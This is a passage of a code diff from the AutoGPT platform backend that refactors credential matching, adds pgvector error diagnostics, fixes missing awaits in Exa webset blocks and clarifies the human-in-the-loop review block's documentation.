+                block_id="standard-id",
+                input_data={},
+            )
+
+        # Should NOT be an ErrorResponse about CoPilot exclusion
+        # (may be other errors like missing credentials, but not the exclusion guard)
+        if isinstance(response, ErrorResponse):
+            assert "cannot be run directly in CoPilot" not in response.message
--- a/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/utils.py
@@ -8,6 +8,7 @@ from backend.api.features.library import model as library_model
 from backend.api.features.store import db as store_db
 from backend.data.graph import GraphModel
 from backend.data.model import (
+    Credentials,
    CredentialsFieldInfo,
    CredentialsMetaInput,
    HostScopedCredentials,
@@ -223,6 +224,99 @@ async def get_or_create_library_agent(
    return library_agents[0]


+async def match_credentials_to_requirements(
+    user_id: str,
+    requirements: dict[str, CredentialsFieldInfo],
+) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
+    """
+    Match user's credentials against a dictionary of credential requirements.
+
+    This is the core matching logic shared by both graph and block credential matching.
+    """
+    matched: dict[str, CredentialsMetaInput] = {}
+    missing: list[CredentialsMetaInput] = []
+
+    if not requirements:
+        return matched, missing
+
+    available_creds = await get_user_credentials(user_id)
+
+    for field_name, field_info in requirements.items():
+        matching_cred = find_matching_credential(available_creds, field_info)
+
+        if matching_cred:
+            try:
+                matched[field_name] = create_credential_meta_from_match(matching_cred)
+            except Exception as e:
+                logger.error(
+                    f"Failed to create CredentialsMetaInput for field '{field_name}': "
+                    f"provider={matching_cred.provider}, type={matching_cred.type}, "
+                    f"credential_id={matching_cred.id}",
+                    exc_info=True,
+                )
+                provider = next(iter(field_info.provider), "unknown")
+                cred_type = next(iter(field_info.supported_types), "api_key")
+                missing.append(
+                    CredentialsMetaInput(
+                        id=field_name,
+                        provider=provider,  # type: ignore
+                        type=cred_type,  # type: ignore
+                        title=f"{field_name} (validation failed: {e})",
+                    )
+                )
+        else:
+            provider = next(iter(field_info.provider), "unknown")
+            cred_type = next(iter(field_info.supported_types), "api_key")
+            missing.append(
+                CredentialsMetaInput(
+                    id=field_name,
+                    provider=provider,  # type: ignore
+                    type=cred_type,  # type: ignore
+                    title=field_name.replace("_", " ").title(),
+                )
+            )
+
+    return matched, missing
+
+
+async def get_user_credentials(user_id: str) -> list[Credentials]:
+    """Get all available credentials for a user."""
+    creds_manager = IntegrationCredentialsManager()
+    return await creds_manager.store.get_all_creds(user_id)
+
+
+def find_matching_credential(
+    available_creds: list[Credentials],
+    field_info: CredentialsFieldInfo,
+) -> Credentials | None:
+    """Find a credential that matches the required provider, type, scopes, and host."""
+    for cred in available_creds:
+        if cred.provider not in field_info.provider:
+            continue
+        if cred.type not in field_info.supported_types:
+            continue
+        if cred.type == "oauth2" and not _credential_has_required_scopes(
+            cred, field_info
+        ):
+            continue
+        if cred.type == "host_scoped" and not _credential_is_for_host(cred, field_info):
+            continue
+        return cred
+    return None
+
+
+def create_credential_meta_from_match(
+    matching_cred: Credentials,
+) -> CredentialsMetaInput:
+    """Create a CredentialsMetaInput from a matched credential."""
+    return CredentialsMetaInput(
+        id=matching_cred.id,
+        provider=matching_cred.provider,  # type: ignore
+        type=matching_cred.type,
+        title=matching_cred.title,
+    )
+
+
 async def match_user_credentials_to_graph(
    user_id: str,
    graph: GraphModel,
@@ -331,8 +425,6 @@ def _credential_has_required_scopes(
    # If no scopes are required, any credential matches
    if not requirements.required_scopes:
        return True
-
-    # Check that credential scopes are a superset of required scopes
    return set(credential.scopes).issuperset(requirements.required_scopes)


--- a/autogpt_platform/backend/backend/api/features/store/hybrid_search.py
+++ b/autogpt_platform/backend/backend/api/features/store/hybrid_search.py
@@ -8,6 +8,7 @@ Includes BM25 reranking for improved lexical relevance.

 import logging
 import re
+import time
 from dataclasses import dataclass
 from typing import Any, Literal

@@ -362,7 +363,11 @@ async def unified_hybrid_search(
        LIMIT {limit_param} OFFSET {offset_param}
    """

-    results = await query_raw_with_schema(sql_query, *params)
+    try:
+        results = await query_raw_with_schema(sql_query, *params)
+    except Exception as e:
+        await _log_vector_error_diagnostics(e)
+        raise

    total = results[0]["total_count"] if results else 0
    # Apply BM25 reranking
@@ -686,7 +691,11 @@ async def hybrid_search(
        LIMIT {limit_param} OFFSET {offset_param}
    """

-    results = await query_raw_with_schema(sql_query, *params)
+    try:
+        results = await query_raw_with_schema(sql_query, *params)
+    except Exception as e:
+        await _log_vector_error_diagnostics(e)
+        raise

    total = results[0]["total_count"] if results else 0

@@ -718,6 +727,87 @@ async def hybrid_search_simple(
    return await hybrid_search(query=query, page=page, page_size=page_size)


+# ============================================================================
+# Diagnostics
+# ============================================================================
+
+# Rate limit: only log vector error diagnostics once per this interval
+_VECTOR_DIAG_INTERVAL_SECONDS = 60
+_last_vector_diag_time: float = 0
+
+
+async def _log_vector_error_diagnostics(error: Exception) -> None:
+    """Log diagnostic info when 'type vector does not exist' error occurs.
+
+    Note: Diagnostic queries use query_raw_with_schema which may run on a different
+    pooled connection than the one that failed. Session-level search_path can differ,
+    so these diagnostics show cluster-wide state, not necessarily the failed session.
+
+    Includes rate limiting to avoid log spam - only logs once per minute.
+    Caller should re-raise the error after calling this function.
+    """
+    global _last_vector_diag_time
+
+    # Check if this is the vector type error
+    error_str = str(error).lower()
+    if not (
+        "type" in error_str and "vector" in error_str and "does not exist" in error_str
+    ):
+        return
+
+    # Rate limit: only log once per interval
+    now = time.time()
+    if now - _last_vector_diag_time < _VECTOR_DIAG_INTERVAL_SECONDS:
+        return
+    _last_vector_diag_time = now
+
+    try:
+        diagnostics: dict[str, object] = {}
+
+        try:
+            search_path_result = await query_raw_with_schema("SHOW search_path")
+            diagnostics["search_path"] = search_path_result
+        except Exception as e:
+            diagnostics["search_path"] = f"Error: {e}"
+
+        try:
+            schema_result = await query_raw_with_schema("SELECT current_schema()")
+            diagnostics["current_schema"] = schema_result
+        except Exception as e:
+            diagnostics["current_schema"] = f"Error: {e}"
+
+        try:
+            user_result = await query_raw_with_schema(
+                "SELECT current_user, session_user, current_database()"
+            )
+            diagnostics["user_info"] = user_result
+        except Exception as e:
+            diagnostics["user_info"] = f"Error: {e}"
+
+        try:
+            # Check pgvector extension installation (cluster-wide, stable info)
+            ext_result = await query_raw_with_schema(
+                "SELECT extname, extversion, nspname as schema "
+                "FROM pg_extension e "
+                "JOIN pg_namespace n ON e.extnamespace = n.oid "
+                "WHERE extname = 'vector'"
+            )
+            diagnostics["pgvector_extension"] = ext_result
+        except Exception as e:
+            diagnostics["pgvector_extension"] = f"Error: {e}"
+
+        logger.error(
+            f"Vector type error diagnostics:\n"
+            f"  Error: {error}\n"
+            f"  search_path: {diagnostics.get('search_path')}\n"
+            f"  current_schema: {diagnostics.get('current_schema')}\n"
+            f"  user_info: {diagnostics.get('user_info')}\n"
+            f"  pgvector_extension: {diagnostics.get('pgvector_extension')}"
+        )
+    except Exception as diag_error:
+        logger.error(f"Failed to collect vector error diagnostics: {diag_error}")
+
+
 # Backward compatibility alias - HybridSearchWeights maps to StoreAgentSearchWeights
 # for existing code that expects the popularity parameter
 HybridSearchWeights = StoreAgentSearchWeights
--- a/autogpt_platform/backend/backend/blocks/exa/websets.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets.py
@@ -478,7 +478,7 @@ class ExaCreateOrFindWebsetBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        try:
-            webset = aexa.websets.get(id=input_data.external_id)
+            webset = await aexa.websets.get(id=input_data.external_id)
            webset_result = Webset.model_validate(webset.model_dump(by_alias=True))

            yield "webset", webset_result
@@ -494,7 +494,7 @@ class ExaCreateOrFindWebsetBlock(Block):
                        count=input_data.search_count,
                    )

-                webset = aexa.websets.create(
+                webset = await aexa.websets.create(
                    params=CreateWebsetParameters(
                        search=search_params,
                        external_id=input_data.external_id,
@@ -554,7 +554,7 @@ class ExaUpdateWebsetBlock(Block):
        if input_data.metadata is not None:
            payload["metadata"] = input_data.metadata

-        sdk_webset = aexa.websets.update(id=input_data.webset_id, params=payload)
+        sdk_webset = await aexa.websets.update(id=input_data.webset_id, params=payload)

        status_str = (
            sdk_webset.status.value
@@ -617,7 +617,7 @@ class ExaListWebsetsBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.list(
+        response = await aexa.websets.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
        )
@@ -678,7 +678,7 @@ class ExaGetWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_webset = aexa.websets.get(id=input_data.webset_id)
+        sdk_webset = await aexa.websets.get(id=input_data.webset_id)

        status_str = (
            sdk_webset.status.value
@@ -748,7 +748,7 @@ class ExaDeleteWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_webset = aexa.websets.delete(id=input_data.webset_id)
+        deleted_webset = await aexa.websets.delete(id=input_data.webset_id)

        status_str = (
            deleted_webset.status.value
@@ -798,7 +798,7 @@ class ExaCancelWebsetBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_webset = aexa.websets.cancel(id=input_data.webset_id)
+        canceled_webset = await aexa.websets.cancel(id=input_data.webset_id)

        status_str = (
            canceled_webset.status.value
@@ -968,7 +968,7 @@ class ExaPreviewWebsetBlock(Block):
                entity["description"] = input_data.entity_description
            payload["entity"] = entity

-        sdk_preview = aexa.websets.preview(params=payload)
+        sdk_preview = await aexa.websets.preview(params=payload)

        preview = PreviewWebsetModel.from_sdk(sdk_preview)

@@ -1051,7 +1051,7 @@ class ExaWebsetStatusBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        status = (
            webset.status.value
@@ -1185,7 +1185,7 @@ class ExaWebsetSummaryBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        # Extract basic info
        webset_id = webset.id
@@ -1211,7 +1211,7 @@ class ExaWebsetSummaryBlock(Block):
        total_items = 0

        if input_data.include_sample_items and input_data.sample_size > 0:
-            items_response = aexa.websets.items.list(
+            items_response = await aexa.websets.items.list(
                webset_id=input_data.webset_id, limit=input_data.sample_size
            )
            sample_items_data = [
@@ -1362,7 +1362,7 @@ class ExaWebsetReadyCheckBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get webset details
-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        status = (
            webset.status.value
--- a/autogpt_platform/backend/backend/blocks/exa/websets_enrichment.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_enrichment.py
@@ -202,7 +202,7 @@ class ExaCreateEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_enrichment = aexa.websets.enrichments.create(
+        sdk_enrichment = await aexa.websets.enrichments.create(
            webset_id=input_data.webset_id, params=payload
        )

@@ -223,7 +223,7 @@ class ExaCreateEnrichmentBlock(Block):
            items_enriched = 0

            while time.time() - poll_start < input_data.polling_timeout:
-                current_enrich = aexa.websets.enrichments.get(
+                current_enrich = await aexa.websets.enrichments.get(
                    webset_id=input_data.webset_id, id=enrichment_id
                )
                current_status = (
@@ -234,7 +234,7 @@ class ExaCreateEnrichmentBlock(Block):

                if current_status in ["completed", "failed", "cancelled"]:
                    # Estimate items from webset searches
-                    webset = aexa.websets.get(id=input_data.webset_id)
+                    webset = await aexa.websets.get(id=input_data.webset_id)
                    if webset.searches:
                        for search in webset.searches:
                            if search.progress:
@@ -329,7 +329,7 @@ class ExaGetEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_enrichment = aexa.websets.enrichments.get(
+        sdk_enrichment = await aexa.websets.enrichments.get(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

@@ -474,7 +474,7 @@ class ExaDeleteEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_enrichment = aexa.websets.enrichments.delete(
+        deleted_enrichment = await aexa.websets.enrichments.delete(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

@@ -525,13 +525,13 @@ class ExaCancelEnrichmentBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_enrichment = aexa.websets.enrichments.cancel(
+        canceled_enrichment = await aexa.websets.enrichments.cancel(
            webset_id=input_data.webset_id, id=input_data.enrichment_id
        )

        # Try to estimate how many items were enriched before cancellation
        items_enriched = 0
-        items_response = aexa.websets.items.list(
+        items_response = await aexa.websets.items.list(
            webset_id=input_data.webset_id, limit=100
        )

--- a/autogpt_platform/backend/backend/blocks/exa/websets_import_export.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_import_export.py
@@ -222,7 +222,7 @@ class ExaCreateImportBlock(Block):
    def _create_test_mock():
        """Create test mocks for the AsyncExa SDK."""
        from datetime import datetime
-        from unittest.mock import MagicMock
+        from unittest.mock import AsyncMock, MagicMock

        # Create mock SDK import object
        mock_import = MagicMock()
@@ -247,7 +247,7 @@ class ExaCreateImportBlock(Block):
        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
                websets=MagicMock(
-                    imports=MagicMock(create=lambda *args, **kwargs: mock_import)
+                    imports=MagicMock(create=AsyncMock(return_value=mock_import))
                )
            )
        }
@@ -294,7 +294,7 @@ class ExaCreateImportBlock(Block):
        if input_data.metadata:
            payload["metadata"] = input_data.metadata

-        sdk_import = aexa.websets.imports.create(
+        sdk_import = await aexa.websets.imports.create(
            params=payload, csv_data=input_data.csv_data
        )

@@ -360,7 +360,7 @@ class ExaGetImportBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_import = aexa.websets.imports.get(import_id=input_data.import_id)
+        sdk_import = await aexa.websets.imports.get(import_id=input_data.import_id)

        import_obj = ImportModel.from_sdk(sdk_import)

@@ -426,7 +426,7 @@ class ExaListImportsBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.imports.list(
+        response = await aexa.websets.imports.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
        )
@@ -474,7 +474,9 @@ class ExaDeleteImportBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_import = aexa.websets.imports.delete(import_id=input_data.import_id)
+        deleted_import = await aexa.websets.imports.delete(
+            import_id=input_data.import_id
+        )

        yield "import_id", deleted_import.id
        yield "success", "true"
@@ -573,14 +575,14 @@ class ExaExportWebsetBlock(Block):
            }
        )

-        # Create mock iterator
-        mock_items = [mock_item1, mock_item2]
+        # Create async iterator for list_all
+        async def async_item_iterator(*args, **kwargs):
+            for item in [mock_item1, mock_item2]:
+                yield item

        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
-                websets=MagicMock(
-                    items=MagicMock(list_all=lambda *args, **kwargs: iter(mock_items))
-                )
+                websets=MagicMock(items=MagicMock(list_all=async_item_iterator))
            )
        }

@@ -602,7 +604,7 @@ class ExaExportWebsetBlock(Block):
                webset_id=input_data.webset_id, limit=input_data.max_items
            )

-            for sdk_item in item_iterator:
+            async for sdk_item in item_iterator:
                if len(all_items) >= input_data.max_items:
                    break

--- a/autogpt_platform/backend/backend/blocks/exa/websets_items.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_items.py
@@ -178,7 +178,7 @@ class ExaGetWebsetItemBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_item = aexa.websets.items.get(
+        sdk_item = await aexa.websets.items.get(
            webset_id=input_data.webset_id, id=input_data.item_id
        )

@@ -269,7 +269,7 @@ class ExaListWebsetItemsBlock(Block):
            response = None

            while time.time() - start_time < input_data.wait_timeout:
-                response = aexa.websets.items.list(
+                response = await aexa.websets.items.list(
                    webset_id=input_data.webset_id,
                    cursor=input_data.cursor,
                    limit=input_data.limit,
@@ -282,13 +282,13 @@ class ExaListWebsetItemsBlock(Block):
                interval = min(interval * 1.2, 10)

            if not response:
-                response = aexa.websets.items.list(
+                response = await aexa.websets.items.list(
                    webset_id=input_data.webset_id,
                    cursor=input_data.cursor,
                    limit=input_data.limit,
                )
        else:
-            response = aexa.websets.items.list(
+            response = await aexa.websets.items.list(
                webset_id=input_data.webset_id,
                cursor=input_data.cursor,
                limit=input_data.limit,
@@ -340,7 +340,7 @@ class ExaDeleteWebsetItemBlock(Block):
    ) -> BlockOutput:
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_item = aexa.websets.items.delete(
+        deleted_item = await aexa.websets.items.delete(
            webset_id=input_data.webset_id, id=input_data.item_id
        )

@@ -408,7 +408,7 @@ class ExaBulkWebsetItemsBlock(Block):
            webset_id=input_data.webset_id, limit=input_data.max_items
        )

-        for sdk_item in item_iterator:
+        async for sdk_item in item_iterator:
            if len(all_items) >= input_data.max_items:
                break

@@ -475,7 +475,7 @@ class ExaWebsetItemsSummaryBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        entity_type = "unknown"
        if webset.searches:
@@ -495,7 +495,7 @@ class ExaWebsetItemsSummaryBlock(Block):
        # Get sample items if requested
        sample_items: List[WebsetItemModel] = []
        if input_data.sample_size > 0:
-            items_response = aexa.websets.items.list(
+            items_response = await aexa.websets.items.list(
                webset_id=input_data.webset_id, limit=input_data.sample_size
            )
            # Convert to our stable models
@@ -569,7 +569,7 @@ class ExaGetNewItemsBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get items starting from cursor
-        response = aexa.websets.items.list(
+        response = await aexa.websets.items.list(
            webset_id=input_data.webset_id,
            cursor=input_data.since_cursor,
            limit=input_data.max_items,
--- a/autogpt_platform/backend/backend/blocks/exa/websets_monitor.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_monitor.py
@@ -233,7 +233,7 @@ class ExaCreateMonitorBlock(Block):
    def _create_test_mock():
        """Create test mocks for the AsyncExa SDK."""
        from datetime import datetime
-        from unittest.mock import MagicMock
+        from unittest.mock import AsyncMock, MagicMock

        # Create mock SDK monitor object
        mock_monitor = MagicMock()
@@ -263,7 +263,7 @@ class ExaCreateMonitorBlock(Block):
        return {
            "_get_client": lambda *args, **kwargs: MagicMock(
                websets=MagicMock(
-                    monitors=MagicMock(create=lambda *args, **kwargs: mock_monitor)
+                    monitors=MagicMock(create=AsyncMock(return_value=mock_monitor))
                )
            )
        }
@@ -320,7 +320,7 @@ class ExaCreateMonitorBlock(Block):
        if input_data.metadata:
            payload["metadata"] = input_data.metadata

-        sdk_monitor = aexa.websets.monitors.create(params=payload)
+        sdk_monitor = await aexa.websets.monitors.create(params=payload)

        monitor = MonitorModel.from_sdk(sdk_monitor)

@@ -384,7 +384,7 @@ class ExaGetMonitorBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_monitor = aexa.websets.monitors.get(monitor_id=input_data.monitor_id)
+        sdk_monitor = await aexa.websets.monitors.get(monitor_id=input_data.monitor_id)

        monitor = MonitorModel.from_sdk(sdk_monitor)

@@ -476,7 +476,7 @@ class ExaUpdateMonitorBlock(Block):
        if input_data.metadata is not None:
            payload["metadata"] = input_data.metadata

-        sdk_monitor = aexa.websets.monitors.update(
+        sdk_monitor = await aexa.websets.monitors.update(
            monitor_id=input_data.monitor_id, params=payload
        )

@@ -522,7 +522,9 @@ class ExaDeleteMonitorBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        deleted_monitor = aexa.websets.monitors.delete(monitor_id=input_data.monitor_id)
+        deleted_monitor = await aexa.websets.monitors.delete(
+            monitor_id=input_data.monitor_id
+        )

        yield "monitor_id", deleted_monitor.id
        yield "success", "true"
@@ -579,7 +581,7 @@ class ExaListMonitorsBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        response = aexa.websets.monitors.list(
+        response = await aexa.websets.monitors.list(
            cursor=input_data.cursor,
            limit=input_data.limit,
            webset_id=input_data.webset_id,
--- a/autogpt_platform/backend/backend/blocks/exa/websets_polling.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_polling.py
@@ -121,7 +121,7 @@ class ExaWaitForWebsetBlock(Block):
                WebsetTargetStatus.IDLE,
                WebsetTargetStatus.ANY_COMPLETE,
            ]:
-                final_webset = aexa.websets.wait_until_idle(
+                final_webset = await aexa.websets.wait_until_idle(
                    id=input_data.webset_id,
                    timeout=input_data.timeout,
                    poll_interval=input_data.check_interval,
@@ -164,7 +164,7 @@ class ExaWaitForWebsetBlock(Block):
                interval = input_data.check_interval
                while time.time() - start_time < input_data.timeout:
                    # Get current webset status
-                    webset = aexa.websets.get(id=input_data.webset_id)
+                    webset = await aexa.websets.get(id=input_data.webset_id)
                    current_status = (
                        webset.status.value
                        if hasattr(webset.status, "value")
@@ -209,7 +209,7 @@ class ExaWaitForWebsetBlock(Block):

                # Timeout reached
                elapsed = time.time() - start_time
-                webset = aexa.websets.get(id=input_data.webset_id)
+                webset = await aexa.websets.get(id=input_data.webset_id)
                final_status = (
                    webset.status.value
                    if hasattr(webset.status, "value")
@@ -345,7 +345,7 @@ class ExaWaitForSearchBlock(Block):
        try:
            while time.time() - start_time < input_data.timeout:
                # Get current search status using SDK
-                search = aexa.websets.searches.get(
+                search = await aexa.websets.searches.get(
                    webset_id=input_data.webset_id, id=input_data.search_id
                )

@@ -401,7 +401,7 @@ class ExaWaitForSearchBlock(Block):
            elapsed = time.time() - start_time

            # Get last known status
-            search = aexa.websets.searches.get(
+            search = await aexa.websets.searches.get(
                webset_id=input_data.webset_id, id=input_data.search_id
            )
            final_status = (
@@ -503,7 +503,7 @@ class ExaWaitForEnrichmentBlock(Block):
        try:
            while time.time() - start_time < input_data.timeout:
                # Get current enrichment status using SDK
-                enrichment = aexa.websets.enrichments.get(
+                enrichment = await aexa.websets.enrichments.get(
                    webset_id=input_data.webset_id, id=input_data.enrichment_id
                )

@@ -548,7 +548,7 @@ class ExaWaitForEnrichmentBlock(Block):
            elapsed = time.time() - start_time

            # Get last known status
-            enrichment = aexa.websets.enrichments.get(
+            enrichment = await aexa.websets.enrichments.get(
                webset_id=input_data.webset_id, id=input_data.enrichment_id
            )
            final_status = (
@@ -575,7 +575,7 @@ class ExaWaitForEnrichmentBlock(Block):
    ) -> tuple[list[SampleEnrichmentModel], int]:
        """Get sample enriched data and count."""
        # Get a few items to see enrichment results using SDK
-        response = aexa.websets.items.list(webset_id=webset_id, limit=5)
+        response = await aexa.websets.items.list(webset_id=webset_id, limit=5)

        sample_data: list[SampleEnrichmentModel] = []
        enriched_count = 0
--- a/autogpt_platform/backend/backend/blocks/exa/websets_search.py
+++ b/autogpt_platform/backend/backend/blocks/exa/websets_search.py
@@ -317,7 +317,7 @@ class ExaCreateWebsetSearchBlock(Block):

        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_search = aexa.websets.searches.create(
+        sdk_search = await aexa.websets.searches.create(
            webset_id=input_data.webset_id, params=payload
        )

@@ -350,7 +350,7 @@ class ExaCreateWebsetSearchBlock(Block):
            poll_start = time.time()

            while time.time() - poll_start < input_data.polling_timeout:
-                current_search = aexa.websets.searches.get(
+                current_search = await aexa.websets.searches.get(
                    webset_id=input_data.webset_id, id=search_id
                )
                current_status = (
@@ -442,7 +442,7 @@ class ExaGetWebsetSearchBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        sdk_search = aexa.websets.searches.get(
+        sdk_search = await aexa.websets.searches.get(
            webset_id=input_data.webset_id, id=input_data.search_id
        )

@@ -523,7 +523,7 @@ class ExaCancelWebsetSearchBlock(Block):
        # Use AsyncExa SDK
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

-        canceled_search = aexa.websets.searches.cancel(
+        canceled_search = await aexa.websets.searches.cancel(
            webset_id=input_data.webset_id, id=input_data.search_id
        )

@@ -604,7 +604,7 @@ class ExaFindOrCreateSearchBlock(Block):
        aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())

        # Get webset to check existing searches
-        webset = aexa.websets.get(id=input_data.webset_id)
+        webset = await aexa.websets.get(id=input_data.webset_id)

        # Look for existing search with same query
        existing_search = None
@@ -636,7 +636,7 @@ class ExaFindOrCreateSearchBlock(Block):
            if input_data.entity_type != SearchEntityType.AUTO:
                payload["entity"] = {"type": input_data.entity_type.value}

-            sdk_search = aexa.websets.searches.create(
+            sdk_search = await aexa.websets.searches.create(
                webset_id=input_data.webset_id, params=payload
            )

--- a/autogpt_platform/backend/backend/blocks/human_in_the_loop.py
+++ b/autogpt_platform/backend/backend/blocks/human_in_the_loop.py
@@ -21,43 +21,71 @@ logger = logging.getLogger(__name__)

 class HumanInTheLoopBlock(Block):
    """
-    This block pauses execution and waits for human approval or modification of the data.
+    Pauses execution and waits for human approval or rejection of the data.

-    When executed, it creates a pending review entry and sets the node execution status
-    to REVIEW. The execution will remain paused until a human user either:
-    - Approves the data (with or without modifications)
-    - Rejects the data
+    When executed, this block creates a pending review entry and sets the node execution
+    status to REVIEW. The execution remains paused until a human user either approves
+    or rejects the data.

-    This is useful for workflows that require human validation or intervention before
-    proceeding to the next steps.
+    **How it works:**
+    - The input data is presented to a human reviewer
+    - The reviewer can approve or reject (and optionally modify the data if editable)
+    - On approval: the data flows out through the `approved_data` output pin
+    - On rejection: the data flows out through the `rejected_data` output pin
+
+    **Important:** The output pins yield the actual data itself, NOT status strings.
+    The approval/rejection decision determines WHICH output pin fires, not the value.
+    You do NOT need to compare the output to "APPROVED" or "REJECTED" - simply connect
+    downstream blocks to the appropriate output pin for each case.
+
+    **Example usage:**
+    - Connect `approved_data` → next step in your workflow (data was approved)
+    - Connect `rejected_data` → error handling or notification (data was rejected)
    """

    class Input(BlockSchemaInput):
-        data: Any = SchemaField(description="The data to be reviewed by a human user")
+        data: Any = SchemaField(
+            description="The data to be reviewed by a human user. "
+            "This exact data will be passed through to either approved_data or "
+            "rejected_data output based on the reviewer's decision."
+        )
        name: str = SchemaField(
-            description="A descriptive name for what this data represents",
+            description="A descriptive name for what this data represents. "
+            "This helps the reviewer understand what they are reviewing.",
        )
        editable: bool = SchemaField(
-            description="Whether the human reviewer can edit the data",
+            description="Whether the human reviewer can edit the data before "
+            "approving or rejecting it",
            default=True,
            advanced=True,
        )

    class Output(BlockSchemaOutput):
        approved_data: Any = SchemaField(
-            description="The data when approved (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer APPROVES it. "
+            "The value is the actual data itself (not a status string like 'APPROVED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'approved' workflow path."
        )
        rejected_data: Any = SchemaField(
-            description="The data when rejected (may be modified by reviewer)"
+            description="Outputs the input data when the reviewer REJECTS it. "
+            "The value is the actual data itself (not a status string like 'REJECTED'). "
+            "If the reviewer edited the data, this contains the modified version. "
+            "Connect downstream blocks here for the 'rejected' workflow path."
        )
        review_message: str = SchemaField(
-            description="Any message provided by the reviewer", default=""
+            description="Optional message provided by the reviewer explaining their "
+            "decision. Only outputs when the reviewer provides a message; "
+            "this pin does not fire if no message was given.",
+            default="",
        )

    def __init__(self):
        super().__init__(
            id="8b2a7b3c-6e9d-4a5f-8c1b-2e3f4a5b6c7d",
-            description="Pause execution and wait for human approval or modification of data",
+            description="Pause execution for human review. Data flows through "
+            "approved_data or rejected_data output based on the reviewer's decision. "
+            "Outputs contain the actual data, not status strings.",
            categories={BlockCategory.BASIC},
            input_schema=HumanInTheLoopBlock.Input,
            output_schema=HumanInTheLoopBlock.Output,
--- a/autogpt_platform/backend/backend/blocks/llm.py
+++ b/autogpt_platform/backend/backend/blocks/llm.py
@@ -531,12 +531,12 @@ class LLMResponse(BaseModel):

 def convert_openai_tool_fmt_to_anthropic(
    openai_tools: list[dict] | None = None,
-) -> Iterable[ToolParam] | anthropic.NotGiven:
+) -> Iterable[ToolParam] | anthropic.Omit:
    """
    Convert OpenAI tool format to Anthropic tool format.
    """
    if not openai_tools or len(openai_tools) == 0:
-        return anthropic.NOT_GIVEN
+        return anthropic.omit

    anthropic_tools = []
    for tool in openai_tools:
@@ -596,10 +596,10 @@ def extract_openai_tool_calls(response) -> list[ToolContentBlock] | None:

 def get_parallel_tool_calls_param(
    llm_model: LlmModel, parallel_tool_calls: bool | None
-):
+) -> bool | openai.Omit:
    """Get the appropriate parallel_tool_calls parameter for OpenAI-compatible APIs."""
    if llm_model.startswith("o") or parallel_tool_calls is None:
-        return openai.NOT_GIVEN
+        return openai.omit
    return parallel_tool_calls


--- a/autogpt_platform/backend/backend/data/execution.py
+++ b/autogpt_platform/backend/backend/data/execution.py
@@ -1,9 +1,8 @@
 import logging
+import queue
 from collections import defaultdict
 from datetime import datetime, timedelta, timezone
 from enum import Enum
-from multiprocessing import Manager
-from queue import Empty
 from typing import (
    TYPE_CHECKING,
    Annotated,
@@ -1200,12 +1199,16 @@ class NodeExecutionEntry(BaseModel):

